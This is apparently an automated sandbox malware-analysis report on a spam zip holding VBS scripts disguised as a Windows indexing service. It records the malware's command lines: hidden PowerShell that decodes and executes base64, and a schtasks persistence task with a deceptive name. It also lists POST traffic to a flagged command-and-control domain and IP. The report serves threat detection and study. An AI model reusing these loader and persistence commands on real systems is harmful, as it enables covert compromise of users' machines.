Field | Value |
---|---|
File name | SPAM2.zip |
Full analysis | https://app.any.run/tasks/23da2aa0-ca4c-4bf2-8334-ce4d42a21a64 |
Verdict | Malicious activity |
Analysis date | October 09, 2019, 15:12:49 |
OS | Windows 7 Professional Service Pack 1 (build: 7601, 64 bit) |
Indicators | |
MIME | application/zip |
File info | Zip archive data, at least v2.0 to extract |
MD5 | 43587316F6B853333100BDC3665B41B0 |
SHA1 | 9FE38448709053E8A37CE09D42DE8BBD48ED35B6 |
SHA256 | 72C4EFCCFE2E5DB4431285670BB407AAEA3885F1AB7E3455BF84F54D9836C08B |
SSDEEP | 768:SSNzKhUE0SVmdaWMQb6lYAZyas94SMsu3Kr6KPi9rh9xF1qyCGuJ3:rNGh/rsMKb6uAHs9TMsh6Kyrh9xF1BCV |

Extension | Type |
---|---|
.zip | ZIP compressed archive (100) |

Field | Value |
---|---|
ZipFileName | WindowsIndexingService (2).vbs |
ZipUncompressedSize | 147104 |
ZipCompressedSize | 7955 |
ZipCRC | 0xbc4c1f04 |
ZipModifyDate | 2019:10:09 17:11:14 |
ZipCompression | Deflated |
ZipBitFlag | - |
ZipRequiredVersion | 20 |

PID | CMD | Path | Indicators | Parent process | Details |
---|---|---|---|---|---|
2648 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\Desktop\SPAM2.zip" | C:\Program Files\WinRAR\WinRAR.exe | — | explorer.exe | User: admin; Company: Alexander Roshal; Integrity Level: MEDIUM; Description: WinRAR archiver; Exit code: 0; Version: 5.60.0 |
2140 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\Desktop\WindowsIndexingService.vbs" | C:\Windows\System32\WScript.exe | — | explorer.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft ® Windows Based Script Host; Exit code: 0; Version: 5.8.7600.16385 |
1876 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -c $a=[string][System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String( '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' ) );iex $a; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | | WScript.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
1540 | "C:\Windows\system32\schtasks.exe" /create /TN WindowsApplicationService /sc DAILY /st 00:00 /f /RI 17 /du 23:59 /TR C:\Users\Public\Libraries\WindowsIndexingService.vbs | C:\Windows\system32\schtasks.exe | — | powershell.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Manages scheduled tasks; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
2100 | "C:\Windows\system32\mmc.exe" "C:\Windows\system32\taskschd.msc" /s | C:\Windows\system32\mmc.exe | — | explorer.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Management Console; Exit code: 3221226540; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
2384 | "C:\Windows\system32\mmc.exe" "C:\Windows\system32\taskschd.msc" /s | C:\Windows\system32\mmc.exe | | explorer.exe | User: admin; Company: Microsoft Corporation; Integrity Level: HIGH; Description: Microsoft Management Console; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
1732 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\Desktop\WindowsIndexingService (2).vbs" | C:\Windows\System32\WScript.exe | — | explorer.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft ® Windows Based Script Host; Exit code: 0; Version: 5.8.7600.16385 |
2296 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -c $a=[string][System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String( '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' ) );iex $a; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | WScript.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
1540 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\Desktop\WindowsIndexingService (3).vbs" | C:\Windows\System32\WScript.exe | — | explorer.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft ® Windows Based Script Host; Exit code: 0; Version: 5.8.7600.16385 |
1856 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -c $a=[string][System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String( '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' ) );iex $a; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | WScript.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |


PID | Process | Filename | Type | MD5 | SHA256 |
---|---|---|---|---|---|
2648 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DRa2648.174\WindowsIndexingService (2).vbs | — | — | — |
2648 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DRa2648.174\WindowsIndexingService (3).vbs | — | — | — |
2648 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DRa2648.174\WindowsIndexingService.vbs | — | — | — |
1876 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\4E9XHDHTJJ0M29JIL6FN.temp | — | — | — |
2296 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0B91S7V9H7DLUOAV9Z22.temp | — | — | — |
1856 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\X5EK5GNG1HWULJHRUJMH.temp | — | — | — |
2384 | mmc.exe | C:\Users\admin\AppData\Roaming\Microsoft\MMC\taskschd | xml | 65EC591D40AB65FE091A4D9493903BCA | CA3EBFCFD19BE1E13B22C73F94022FBFA6F48AB2F2B71B70654AFCA51757D8BE |
1856 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF165931.TMP | binary | 4C55FB736B5823D4C1F277BE226111D3 | A7471F464E931AAD365E5A751019F5F21931417F3DCD221ADC662ED7215EEE5B |
1876 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF15c722.TMP | binary | 4C55FB736B5823D4C1F277BE226111D3 | A7471F464E931AAD365E5A751019F5F21931417F3DCD221ADC662ED7215EEE5B |
1876 | powershell.exe | C:\Users\Public\Libraries\thumbcache_64.db | text | C443AEE41897B6A40F4F7029980AA5CC | D7DB6272491D77B2847D5B411085CA1A82DA961CACF87A798F64C88B4B27E643 |

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
1876 | powershell.exe | POST | 200 | 185.212.47.91:80 | http://cdn.unitycareers.com/ | DE | text | 24 b | malicious |
1876 | powershell.exe | POST | 200 | 185.212.47.91:80 | http://cdn.unitycareers.com/ | DE | text | 3.48 Kb | malicious |

PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
1876 | powershell.exe | 185.212.47.91:80 | cdn.unitycareers.com | 23media GmbH | DE | malicious |

Domain | IP | Reputation |
---|---|---|
cdn.unitycareers.com | | malicious |


Process | Message |
---|---|
mmc.exe | Constructor: Microsoft.TaskScheduler.SnapIn.TaskSchedulerSnapIn |
mmc.exe | OnInitialize: Microsoft.TaskScheduler.SnapIn.TaskSchedulerSnapIn |
mmc.exe | AddIcons: Microsoft.TaskScheduler.SnapIn.TaskSchedulerSnapIn |
mmc.exe | ProcessCommandLineArguments: Microsoft.TaskScheduler.SnapIn.TaskSchedulerSnapIn |
mmc.exe | Constructor: Microsoft.TaskScheduler.SnapIn.TaskSchedulerSnapIn |
mmc.exe | AddIcons: Microsoft.TaskScheduler.SnapIn.TaskSchedulerSnapIn |
mmc.exe | AddIcons: Microsoft.TaskScheduler.SnapIn.TaskSchedulerSnapIn |
mmc.exe | ProcessCommandLineArguments: Microsoft.TaskScheduler.SnapIn.TaskSchedulerSnapIn |